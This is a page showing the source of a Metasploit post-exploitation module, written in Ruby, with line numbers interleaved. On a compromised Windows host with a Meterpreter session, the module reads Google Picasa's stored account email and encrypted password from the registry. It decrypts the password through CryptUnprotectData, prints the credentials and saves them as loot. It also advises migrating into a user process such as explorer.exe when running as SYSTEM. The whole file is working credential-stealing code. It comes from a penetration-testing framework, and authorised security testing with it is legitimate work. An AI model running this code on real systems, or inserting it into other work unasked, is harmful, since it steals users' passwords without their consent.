Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::Windows::Registry
8
include Msf::Post::Windows::Priv
9
include Msf::Auxiliary::Report
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Windows Gather Google Picasa Password Extractor',
16
'Description' => %q{
17
This module extracts and decrypts the login passwords
18
stored by Google Picasa.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [
22
'Unknown', # SecurityXploded Team, www.SecurityXploded.com
23
'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
24
],
25
'Platform' => [ 'win' ],
26
'SessionTypes' => [ 'meterpreter' ],
27
'Notes' => {
28
'Stability' => [CRASH_SAFE],
29
'SideEffects' => [],
30
'Reliability' => []
31
},
32
'Compat' => {
33
'Meterpreter' => {
34
'Commands' => %w[
35
stdapi_railgun_api
36
stdapi_sys_config_getuid
37
stdapi_sys_process_attach
38
stdapi_sys_process_get_processes
39
stdapi_sys_process_getpid
40
stdapi_sys_process_memory_allocate
41
stdapi_sys_process_memory_read
42
stdapi_sys_process_memory_write
43
]
44
}
45
}
46
)
47
)
48
end
49
50
def prepare_railgun
51
if !session.railgun.get_dll('crypt32')
52
session.railgun.add_dll('crypt32')
53
end
54
end
55
56
def decrypt_password(data)
57
pid = client.sys.process.getpid
58
process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
59
60
mem = process.memory.allocate(512)
61
process.memory.write(mem, data)
62
63
if session.sys.process.each_process.find { |i| i['pid'] == pid }['arch'] == 'x86'
64
addr = [mem].pack('V')
65
len = [data.length].pack('V')
66
ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
67
len, addr = ret['pDataOut'].unpack('V2')
68
else
69
addr = [mem].pack('Q')
70
len = [data.length].pack('Q')
71
ret = session.railgun.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
72
len, addr = ret['pDataOut'].unpack('Q2')
73
end
74
75
return '' if len == 0
76
77
decrypted_pw = process.memory.read(addr, len)
78
return decrypted_pw
79
end
80
81
def get_registry
82
print_status('Looking in registry for stored login passwords by Picasa ...')
83
84
username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaEmail') || ''
85
password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\', 'GaiaPass') || ''
86
87
credentials = Rex::Text::Table.new(
88
'Header' => 'Picasa Credentials',
89
'Indent' => 1,
90
'Columns' =>
91
[
92
'User',
93
'Password'
94
]
95
)
96
97
foundcreds = 0
98
if !username.empty? && !password.empty?
99
passbin = [password].pack('H*')
100
pass = decrypt_password(passbin)
101
102
if pass && !pass.empty?
103
print_status('Found Picasa 2 credentials.')
104
print_good("Username: #{username}\t Password: #{pass}")
105
106
foundcreds = 1
107
credentials << [username, pass]
108
end
109
end
110
111
# For early versions of Picasa3
112
username = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaEmail') || ''
113
password = registry_getvaldata('HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\', 'GaiaPass') || ''
114
115
if !username.empty? && !password.empty?
116
passbin = [password].pack('H*')
117
pass = decrypt_password(passbin)
118
119
if pass && !pass.empty?
120
print_status('Found Picasa 3 credentials.')
121
print_good("Username: #{username}\t Password: #{pass}")
122
123
foundcreds = 1
124
credentials << [username, pass]
125
end
126
end
127
128
if foundcreds == 1
129
path = store_loot(
130
'picasa.creds',
131
'text/csv',
132
session,
133
credentials.to_csv,
134
'decrypted_picasa_data.csv',
135
'Decrypted Picasa Passwords'
136
)
137
138
print_status("Decrypted passwords saved in: #{path}")
139
else
140
print_status('No Picasa credentials found.')
141
end
142
rescue StandardError => e
143
print_error("An error has occurred: #{e}")
144
end
145
146
def run
147
uid = session.sys.config.getuid # Decryption only works in context of user's account.
148
149
if is_system?
150
print_error("This module is running under #{uid}.")
151
print_error('Automatic decryption will not be possible.')
152
print_error('Migrate to a user process to achieve successful decryption (e.g. explorer.exe).')
153
else
154
prepare_railgun
155
get_registry
156
end
157
158
print_status('Done')
159
end
160
end
161
162